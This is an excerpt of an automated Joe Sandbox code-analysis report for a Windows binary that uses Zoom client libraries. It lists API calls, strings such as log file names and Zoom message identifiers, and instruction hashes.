                • Instruction ID: 4612c2056b9d3e9c172ca146a952c7fd0e28d0d7c21e1b93981605e01377bd50
                • Opcode Fuzzy Hash: fdf2438b5b92ff1521ba969def3c184e31f34b5c8cb02d3d13921d3bae2bb001
                • Instruction Fuzzy Hash: 1A21F2391087429F8710DFA4E884AEA7BE9EF85750F04492EE8A5D3251CF30D90AEA61
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBE8B4
                • ?IntToString@Cmm@@YAXHAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(?,00D33368), ref: 00CBEAB0
                  • Part of subcall function 00CA16E7: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,00CA1789,?,?,?,?,?,00CAC2A6,?), ref: 00CA16F0
                  • Part of subcall function 00CA16E7: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00CA1789,?,?,?,?,?,00CAC2A6,?), ref: 00CA170A
                  • Part of subcall function 00CA16E7: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA171A
                • ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z.RWSNDPQSKZ(?,00D3D264,?,00D35050,00000000,00000148,00CBEE5D,?), ref: 00CBE938
                  • Part of subcall function 00C5E1B0: ?Explode@Time@Cmm@@ABEX_NPAUExploded@12@@Z.RWSNDPQSKZ(00000001,?), ref: 00C5E1BB
                  • Part of subcall function 00CAEA80: __EH_prolog3.LIBCMT ref: 00CAEA87
                  • Part of subcall function 00C5A0A6: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00000000,?,00C64731), ref: 00C5A0BC
                  • Part of subcall function 00C52FC0: __EH_prolog3_catch.LIBCMT ref: 00C52FC7
                  • Part of subcall function 00C52FC0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000028,00C64738), ref: 00C53042
                  • Part of subcall function 00C57B52: __EH_prolog3.LIBCMT ref: 00C57B59
                • ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,?,?), ref: 00CBEA1A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?), ref: 00CBEA2E
                Strings
                Similarity
                • API ID: Cmm@@$StringTime$Explode@Exploded@12@@H_prolog3State@Time@Unlock@V12@$??0?$AssignD@2@@std@@@D@std@@FileH_prolog3_H_prolog3_catchLocalNow@Other@?$String@SystemTicks@U?$char_traits@Unothrow_t@std@@@V?$allocator@V?$basic_string@W@1@@__ehfuncinfo$??2@
                • String ID: .log$0
                • API String ID: 3539067199-692761683
                • Opcode ID: cc9fa4fc0effd4fc9d1c8252c5fef71827e2b7c0862ffa1dfa632164781a2ecb
                • Instruction ID: 997145105afaaf409d4c796b0a2b8aae1970baed8761dc87fc901f45e6f9adfd
                • Opcode Fuzzy Hash: cc9fa4fc0effd4fc9d1c8252c5fef71827e2b7c0862ffa1dfa632164781a2ecb
                • Instruction Fuzzy Hash: F0518C75D002189BCF14EFA4DC56BDDB7B9AF54301F00846AF90AA7282DF749A8CDB14
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBE61F
                • CreateFileW.KERNEL32(.\debug.log,40000000,00000003,00000000,00000004,00000080,00000000,00000000), ref: 00CBE6DD
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0000003C,00CADEA7), ref: 00CBE726
                Strings
                Similarity
                • API ID: File$CreateH_prolog3_Pointer
                • String ID: .\debug.log
                • API String ID: 3541882424-3649441461
                • Opcode ID: 8ed63d6dd20695d1cd1f308f98ad3c4c5b5a7f26533fca33c6feed5eeb52a9ef
                • Instruction ID: 4e309e02c007cdb944fb27bf5312e833bee951ccb976cc616d43876f7f80bee5
                • Opcode Fuzzy Hash: 8ed63d6dd20695d1cd1f308f98ad3c4c5b5a7f26533fca33c6feed5eeb52a9ef
                • Instruction Fuzzy Hash: D1515F70900305EADF249F64C889BDA7BB5AF04B15F204159F914BF1D2DBB0DA85DB64
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00CE6A07
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00CE6A0F
                • _ValidateLocalCookies.LIBCMT ref: 00CE6A98
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00CE6AC3
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001), ref: 00CE6ADC
                • _ValidateLocalCookies.LIBCMT ref: 00CE6B18
                Strings
                Similarity
                • API ID: CookiesLocalValidate$Cmm@@CurrentImageNonwritableState@Unlock@___except_validate_context_record
                • String ID: csm
                • API String ID: 1484581595-1018135373
                • Opcode ID: 05c134126be301087bfe9a5e222e2675d1f9e07d541d08f9f7f769a211050f51
                • Instruction ID: 9ed5ee7a94af65213a21ababf0405e023d337c293a2e7eaf14b3f55354e12673
                • Opcode Fuzzy Hash: 05c134126be301087bfe9a5e222e2675d1f9e07d541d08f9f7f769a211050f51
                • Instruction Fuzzy Hash: 8D41D930E10288DFCF10DF6AC884A9EBBB5EF55354F14C065E825AB392D731EA55DBA0
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBEBDD
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(00000000,0000007C,00CBEDC1,00DFFA28,?,00DFFA28,00DFFA28,00DFFA28,00DFFA28,?,00CBEE52,00000000,00000000,?), ref: 00CBEBFF
                • ?IntToString@Cmm@@YAXHAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(?,00000000,last_log_file_id.txt,00D3D264,?,00D35050,00000000,0000007C,00CBEDC1,00DFFA28,?,00DFFA28), ref: 00CBEC5F
                  • Part of subcall function 00C64400: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?), ref: 00C6443A
                • ?AssignOther@?$CStringT@D@Cmm@@QAEAAV12@ABV?$CStringT@_W@2@@Z.RWSNDPQSKZ(00000000), ref: 00CBEC88
                  • Part of subcall function 00C55C50: ?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z.RWSNDPQSKZ(?,00000000,?,?), ref: 00C55C6B
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(-00000004), ref: 00CBEC9C
                • cmm_fs_write.RWSNDPQSKZ(00DFFA28,?,?,00000001), ref: 00CBECF7
                  • Part of subcall function 00C63010: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00C63034
                  • Part of subcall function 00C63010: ?Write@CFile@Cmm@@QAEIPBXI@Z.RWSNDPQSKZ(?,?), ref: 00C6304F
                  • Part of subcall function 00C63010: ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C63059
                Strings
                Similarity
                • API ID: Cmm@@$String$??0?$File@$?_cstring_set@AssignAssign@?$Close@CreateD@1@FileH_prolog3_Other@?$String@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@1@@W@2@@W@2@@std@@@W@std@@Write@cmm_fs_write
                • String ID: last_log_file_id.txt
                • API String ID: 438820029-1594190529
                • Opcode ID: 0fdb49ffb8918110fc185356e079b132c8b6a4d8e4917df571ccba1de82a85de
                • Instruction ID: 92a48be7855ccb3f9b12522f05ed1a56713090388f58278e2d2ea30103dc9500
                • Opcode Fuzzy Hash: 0fdb49ffb8918110fc185356e079b132c8b6a4d8e4917df571ccba1de82a85de
                • Instruction Fuzzy Hash: 6141F575C00318DFDB24DFA4C891ADDBBB4AF18305F94842AE81677252DB706A89DB25
                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CB768F,?,?,?,?,?,?,00000028), ref: 00CB4C76
                • GetModuleHandleW.KERNEL32(Kernelbase.dll,?,?,00CB768F,?,?,?,?,?,?,00000028), ref: 00CB4C90
                • GetProcAddress.KERNEL32(00000000,LoadLibraryExW), ref: 00CB4CA9
                • GetProcAddress.KERNEL32(00000000,LoadLibraryExW), ref: 00CB4CC1
                Strings
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Kernelbase.dll$LoadLibraryExW$kernel32.dll
                • API String ID: 1646373207-1600517536
                • Opcode ID: 9b92a26125a8d235f288a4795ef3561e9276e51e36c5cafdc4c5471542c906da
                • Instruction ID: 8ae1cdf155b7920fba79f7bd70780ea31ca49e342f97c4c12fd3277da0618fa8
                • Opcode Fuzzy Hash: 9b92a26125a8d235f288a4795ef3561e9276e51e36c5cafdc4c5471542c906da
                • Instruction Fuzzy Hash: 80F04435746321AF8B288B79BE949B73AA99B85F917018139EC16D3351DF20CD42C6B4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74187
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.conf.lcp.record.operate,00002769,Key,Value,Section,OperationType,00000004), ref: 00C741B1
                  • Part of subcall function 00C885B0: __EH_prolog3.LIBCMT ref: 00C885B7
                  • Part of subcall function 00C885B0: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7E368,?,?,?,?,?,?,00000004,00C69E19,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C885D0
                  • Part of subcall function 00C92BC0: __EH_prolog3_GS.LIBCMT ref: 00C92BC7
                  • Part of subcall function 00C92BC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92BF9
                  • Part of subcall function 00C92BC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92C27
                  • Part of subcall function 00C92BC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type), ref: 00C92C64
                  • Part of subcall function 00C92BC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId), ref: 00C92C94
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$H0000@H000@H_prolog3_Node@23@Root@Template_3@Template_4@TreeV12@@
                • String ID: Key$OperationType$Section$Value$com.Zoom.app.conf.lcp.record.operate
                • API String ID: 2902713577-2369004328
                • Opcode ID: e85534b511090800511a5b51b609331f4e149bf8591fc15af396032aee14657f
                • Instruction ID: 6c318c9e0166eba3f434a31b01763040214e885a6847bcd3429baa84e90c8db2
                • Opcode Fuzzy Hash: e85534b511090800511a5b51b609331f4e149bf8591fc15af396032aee14657f
                • Instruction Fuzzy Hash: 91F0ECB5744B58FFDB20BB446C56F3B61A49B50F15F900568B104AA3C1CBF04D8892FC
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72B77
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C72BA1
                  • Part of subcall function 00C885B0: __EH_prolog3.LIBCMT ref: 00C885B7
                  • Part of subcall function 00C885B0: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7E368,?,?,?,?,?,?,00000004,00C69E19,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C885D0
                  • Part of subcall function 00C92BC0: __EH_prolog3_GS.LIBCMT ref: 00C92BC7
                  • Part of subcall function 00C92BC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92BF9
                  • Part of subcall function 00C92BC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92C27
                  • Part of subcall function 00C92BC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type), ref: 00C92C64
                  • Part of subcall function 00C92BC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId), ref: 00C92C94
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$H0000@H000@H_prolog3_Node@23@Root@Template_3@Template_4@TreeV12@@
                • String ID: Type$com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify$strMsg$strUserId$strUserName
                • API String ID: 2902713577-1802342954
                • Opcode ID: c095c30a6deb8716ceb8140bcc962b0686dd2c45c20ab39e3f4adce1c3f0b1a8
                • Instruction ID: 27ead2e2af3995a58650482b0632601cc0a6f725723cf6df54248288665b2f91
                • Opcode Fuzzy Hash: c095c30a6deb8716ceb8140bcc962b0686dd2c45c20ab39e3f4adce1c3f0b1a8
                • Instruction Fuzzy Hash: 1DF06571B80381FFD710AB559C56F6B6664EB50F29F80842CB1146E3D2CBF54E08C6B1
                APIs
                • __EH_prolog3.LIBCMT ref: 00C701E7
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.pt.notify.zpns.meeting.start,0000275D,strType,meetingId,meetingNumber,originalMeetingNumber,00000004), ref: 00C7020F
                  • Part of subcall function 00C85340: __EH_prolog3.LIBCMT ref: 00C85347
                  • Part of subcall function 00C85340: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7FCD8,?,?,?,?,?,?,00000004,00C67ED9,com.Zoom.app.pt.startAppShare), ref: 00C85360
                  • Part of subcall function 00C90C5C: __EH_prolog3_GS.LIBCMT ref: 00C90C63
                  • Part of subcall function 00C90C5C: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C7023B), ref: 00C90C77
                  • Part of subcall function 00C90C5C: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.notify.zpns.meeting.start,00000044,00C7023B), ref: 00C90CA9
                  • Part of subcall function 00C90C5C: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C90CE6
                  • Part of subcall function 00C90C5C: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.notify.zpns.meeting.start,?,-00000004), ref: 00C90D18
                  • Part of subcall function 00C90C5C: EnterCriticalSection.KERNEL32(00C7023B), ref: 00C90D9A
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@V12@@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: com.Zoom.app.pt.notify.zpns.meeting.start$meetingId$meetingNumber$originalMeetingNumber$strType
                • API String ID: 2242627570-116605177
                • Opcode ID: 8daecf815f94032f53f432a79812705748b35a815318d8d1815860c64dc2fb83
                • Instruction ID: 39ad7005b4940e74baa0238bd9b3af890db6aed2df4428043523308331ef261c
                • Opcode Fuzzy Hash: 8daecf815f94032f53f432a79812705748b35a815318d8d1815860c64dc2fb83
                • Instruction Fuzzy Hash: 96E06DB1644750AEC7107B68980AB5A7660AF10B59F444578B1146E2D1CBF44908D7B6
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C227
                • ??0?$CmmMessageTemplate_4@IIV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.framework.setting.updated,0000753C,policy_scene,message_type,key,dest_process,00000004), ref: 00C6C24F
                  • Part of subcall function 00C8BE40: __EH_prolog3.LIBCMT ref: 00C8BE47
                  • Part of subcall function 00C8BE40: ??0?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C6C254,com.zoom.app.framework.setting.updated,0000753C,policy_scene,message_type,key,dest_process,00000004), ref: 00C8BE60
                  • Part of subcall function 00C8BFFD: __EH_prolog3_GS.LIBCMT ref: 00C8C004
                  • Part of subcall function 00C8BFFD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C27B), ref: 00C8C018
                  • Part of subcall function 00C8BFFD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.framework.setting.updated,00000044,00C6C27B), ref: 00C8C04A
                  • Part of subcall function 00C8BFFD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8C087
                  • Part of subcall function 00C8BFFD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.framework.setting.updated,?,-00000004), ref: 00C8C0B9
                  • Part of subcall function 00C8BFFD: EnterCriticalSection.KERNEL32(00C6C27B), ref: 00C8C13B
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$Cmm@@@CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: com.zoom.app.framework.setting.updated$dest_process$key$message_type$policy_scene
                • API String ID: 1612829399-2358021257
                • Opcode ID: 1ea3c70280756c75669b6de8837bd077a3c6d1cc140c65836c8fbf17cff4986e
                • Instruction ID: 9fa650f78fe33f1cbb015f2a9b60c496099275825af34585fa6f5c78fc6282a7
                • Opcode Fuzzy Hash: 1ea3c70280756c75669b6de8837bd077a3c6d1cc140c65836c8fbf17cff4986e
                • Instruction Fuzzy Hash: 2CE09BB4BC4380BACB2077589C4775E76506B20B15F414668B650192D7CBF84504DB75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C477
                • ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IV12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.pt.mediaapi.response,0000274A,requestID,response_code,response_data,in_meeting,00000004), ref: 00C6C49F
                  • Part of subcall function 00C8C3D0: __EH_prolog3.LIBCMT ref: 00C8C3D7
                  • Part of subcall function 00C8C3D0: ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C6C4A4,com.Zoom.app.pt.mediaapi.response,0000274A,requestID,response_code,response_data,in_meeting,00000004), ref: 00C8C3F0
                  • Part of subcall function 00C8C570: __EH_prolog3_GS.LIBCMT ref: 00C8C577
                  • Part of subcall function 00C8C570: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C4CB), ref: 00C8C58B
                  • Part of subcall function 00C8C570: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.response,00000044,00C6C4CB), ref: 00C8C5BD
                  • Part of subcall function 00C8C570: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8C5FA
                  • Part of subcall function 00C8C570: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.response,?,-00000004), ref: 00C8C62C
                  • Part of subcall function 00C8C570: EnterCriticalSection.KERNEL32(00C6C4CB), ref: 00C8C6AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@V12@@
                • String ID: com.Zoom.app.pt.mediaapi.response$in_meeting$requestID$response_code$response_data
                • API String ID: 3479804182-917114086
                • Opcode ID: 698f6ebc8fdf73b95b11d697a0a1b4fcb9724e18386d36b15387b36ca6de7093
                • Instruction ID: 3837951b922d762b7cf2988103ef88b6ed07a3628c78d782eb09fe3606b282a6
                • Opcode Fuzzy Hash: 698f6ebc8fdf73b95b11d697a0a1b4fcb9724e18386d36b15387b36ca6de7093
                • Instruction Fuzzy Hash: 4AE092B1A80340BEDB10BB64AD4777E6290AB00B59F818128B2855A2E1CFF45908D77E
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A587
                • ??0?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.promptProxyAuth,0000272F,TheProxyType,Server,Port,Description,00000004), ref: 00C6A5AF
                  • Part of subcall function 00C89090: __EH_prolog3.LIBCMT ref: 00C89097
                  • Part of subcall function 00C89090: ??0?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C6A5B4,com.zoom.app.promptProxyAuth,0000272F,TheProxyType,Server,Port,Description,00000004), ref: 00C890B0
                  • Part of subcall function 00C89270: __EH_prolog3_GS.LIBCMT ref: 00C89277
                  • Part of subcall function 00C89270: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6A5DB), ref: 00C8928B
                  • Part of subcall function 00C89270: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.promptProxyAuth,00000044,00C6A5DB), ref: 00C892BD
                  • Part of subcall function 00C89270: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C892FA
                  • Part of subcall function 00C89270: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.promptProxyAuth,?,-00000004), ref: 00C8932C
                  • Part of subcall function 00C89270: EnterCriticalSection.KERNEL32(00C6A5DB), ref: 00C893AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@@
                • String ID: Description$Port$Server$TheProxyType$com.zoom.app.promptProxyAuth
                • API String ID: 2908724648-1665129770
                • Opcode ID: fb6b2e19c44c45c9ca779dd364695bee0b4f49131f49a8641f63f3f779cba429
                • Instruction ID: 64ac140206dbc470b0cdb58039ec417946e0835da6901f907157f25f89041140
                • Opcode Fuzzy Hash: fb6b2e19c44c45c9ca779dd364695bee0b4f49131f49a8641f63f3f779cba429
                • Instruction Fuzzy Hash: 9EE09B70B40750AAC7147B55B80B75D77609700B65F444518B102692E5CBF0050CDF76
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68557
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@I_JI@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.conf.inviteFacebookBuddy,0000271A,MeetingID,parentWnd,MeetingNumber,TabOrder,00000004), ref: 00C6857F
                  • Part of subcall function 00C85D70: __EH_prolog3.LIBCMT ref: 00C85D77
                  • Part of subcall function 00C85D70: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C68584,com.Zoom.app.conf.inviteFacebookBuddy,0000271A,MeetingID,parentWnd,MeetingNumber,TabOrder,00000004), ref: 00C85D90
                  • Part of subcall function 00C85F9D: __EH_prolog3_GS.LIBCMT ref: 00C85FA4
                  • Part of subcall function 00C85F9D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C685AB), ref: 00C85FB8
                  • Part of subcall function 00C85F9D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inviteFacebookBuddy,00000044,00C685AB), ref: 00C85FEA
                  • Part of subcall function 00C85F9D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C86027
                  • Part of subcall function 00C85F9D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inviteFacebookBuddy,?,-00000004), ref: 00C86059
                  • Part of subcall function 00C85F9D: EnterCriticalSection.KERNEL32(00C685AB), ref: 00C860DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: MeetingID$MeetingNumber$TabOrder$com.Zoom.app.conf.inviteFacebookBuddy$parentWnd
                • API String ID: 901953857-3376588250
                • Opcode ID: e79f5cc8916b636ad236f54c36867bf0d508c4cd1c82fe2c6a8b107cf35eb834
                • Instruction ID: bbf683b37fe27109b672529d78fb9ae48742264a1dc424ea6fd4c36a34f3f608
                • Opcode Fuzzy Hash: e79f5cc8916b636ad236f54c36867bf0d508c4cd1c82fe2c6a8b107cf35eb834
                • Instruction Fuzzy Hash: 53E0D8B1A40F40AFE711BB986C8B75C7750AB00F1AF500569F1016E2D6CBF40548D7B9
                APIs
